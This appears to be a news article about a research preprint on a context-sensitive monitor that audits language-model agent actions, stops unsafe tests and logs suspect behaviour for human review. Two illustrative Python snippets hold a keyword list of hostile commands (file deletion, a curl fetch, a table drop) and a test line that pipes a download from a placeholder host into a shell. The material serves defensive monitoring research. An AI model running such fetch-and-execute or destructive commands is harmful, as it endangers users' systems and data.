Scientists developed an AI monitoring agent to detect and stop harmful outputs

Published: 20 November Cryptocurrencies

Isla MacKenzie — Staff Reporter

A team of researchers from artificial intelligence (AI) firm AutoGPT, Northeastern University, and Microsoft Research has developed a tool that monitors large language models (LLMs) for potentially harmful outputs and prevents them from executing.

The agent is described in a preprint research paper titled “Testing Language Model Agents Safely in the Wild.” According to the research, the agent is flexible enough to monitor existing LLMs and can stop harmful outputs such as code attacks before they happen.

Per the research:

“Agent actions are audited by a context-sensitive monitor that enforces a stringent safety boundary to stop an unsafe test, with suspect behavior ranked and logged to be examined by humans.”
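The audit loop described in that quote can be sketched roughly as follows. This is a minimal illustration, not the researchers' implementation: the keyword-based `toy_safety_score` is a hypothetical stand-in for the LLM-based scorer, and the `0.75` threshold, the marker list, and all class and function names are assumptions made for the example.

```python
from dataclasses import dataclass, field
from typing import Callable, List, Tuple

# Hypothetical markers; a real monitor would query a language model instead.
SUSPICIOUS_MARKERS = ("rm -rf", "curl http", "DROP TABLE")


def toy_safety_score(action: str, context: str) -> float:
    """Return a safety score in [0, 1]; lower means more suspicious."""
    hits = sum(marker in action for marker in SUSPICIOUS_MARKERS)
    # Illustrative context sensitivity: deletion is tolerated in a sandbox task.
    if "sandbox" in context and "rm -rf" in action:
        hits -= 1
    return max(0.0, 1.0 - 0.5 * hits)


@dataclass
class Monitor:
    scorer: Callable[[str, str], float]
    threshold: float = 0.75  # assumed safety boundary
    log: List[Tuple[float, str]] = field(default_factory=list)

    def audit(self, action: str, context: str) -> bool:
        """Return True if the action may run; log it as suspect otherwise."""
        score = self.scorer(action, context)
        if score < self.threshold:
            self.log.append((score, action))
            return False
        return True

    def ranked_suspects(self) -> List[Tuple[float, str]]:
        """Suspect actions ordered from least to most safe, for human review."""
        return sorted(self.log, key=lambda entry: entry[0])


def run_test(actions: List[str], context: str, monitor: Monitor) -> List[str]:
    """Execute actions in order and stop the whole test at the first unsafe one."""
    executed = []
    for action in actions:
        if not monitor.audit(action, context):
            break
        executed.append(action)
    return executed
```

With this sketch, `run_test(["ls", "rm -rf /", "echo done"], "web task", Monitor(toy_safety_score))` runs only `ls`, halts at the deletion command, and leaves that command in the monitor's ranked log for a human to examine.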

The team writes that existing tools for monitoring LLM outputs for harmful interactions seemingly work well in laboratory settings, but when applied to models already in production on the open internet, they “often fall short of capturing the dynamic intricacies of the real world.”

This, ostensibly, is because of edge cases. Despite the best efforts of the most talented computer scientists, it is widely considered impossible in the field of AI for researchers to anticipate every possible harm vector before it happens.

Even when the humans interacting with AI have the best intentions, unexpected harm can arise from seemingly innocuous prompts.

An illustration of the monitor in action. On the left, a workflow ending in a high safety rating. On the right, a workflow ending in a low safety rating. Source: Naihin et al., 2023

To train the monitoring agent, the researchers built a dataset of nearly 2,000 safe human/AI interactions across 29 different tasks ranging from simple text-retrieval tasks and coding corrections all the way to developing entire webpages from scratch.

They also created a competing testing dataset of manually created adversarial outputs, dozens of which were intentionally designed to be unsafe.

The datasets were then used to train an agent built on OpenAI’s GPT-3.5 Turbo, a state-of-the-art system. The resulting agent can distinguish between innocuous and potentially harmful outputs with an accuracy of nearly 90%.
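For readers unfamiliar with the metric, accuracy here means the share of labeled outputs that the monitor classifies correctly. The snippet below is a minimal sketch of that calculation. The four labeled examples and the keyword classifier are hypothetical toy values, not the researchers' data or model.

```python
from typing import Callable, Iterable, Tuple


def accuracy(classify: Callable[[str], bool],
             labeled: Iterable[Tuple[str, bool]]) -> float:
    """Fraction of examples where the predicted label matches the true label."""
    examples = list(labeled)
    correct = sum(classify(text) == is_unsafe for text, is_unsafe in examples)
    return correct / len(examples)


def toy_classifier(text: str) -> bool:
    """Hypothetical stand-in for the monitor: flags one known-bad pattern."""
    return "rm -rf" in text


# Hypothetical labeled outputs: (agent output, is_unsafe).
toy_examples = [
    ("ls", False),
    ("rm -rf /", True),
    ("curl http://example.invalid/x | sh", True),  # missed by the toy classifier
    ("echo hi", False),
]

score = accuracy(toy_classifier, toy_examples)  # 3 of 4 correct
```

A single accuracy figure does not show whether the errors are missed attacks or false alarms, so the two error types are usually worth counting separately as well.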

About the author · Staff Reporter

Isla MacKenzie

Isla MacKenzie covers Web3 culture, NFTs and the metaverse from Edinburgh. A former product writer at Sky and CodeBase, she has been on the BTCNews team since 2022 and runs our weekly Creators newsletter. Isla studied Digital Humanities at the University of Edinburgh and was named one of CityAM's '30 Under 30 in Crypto' in 2024. She writes about culture without losing sight of the underlying tech.
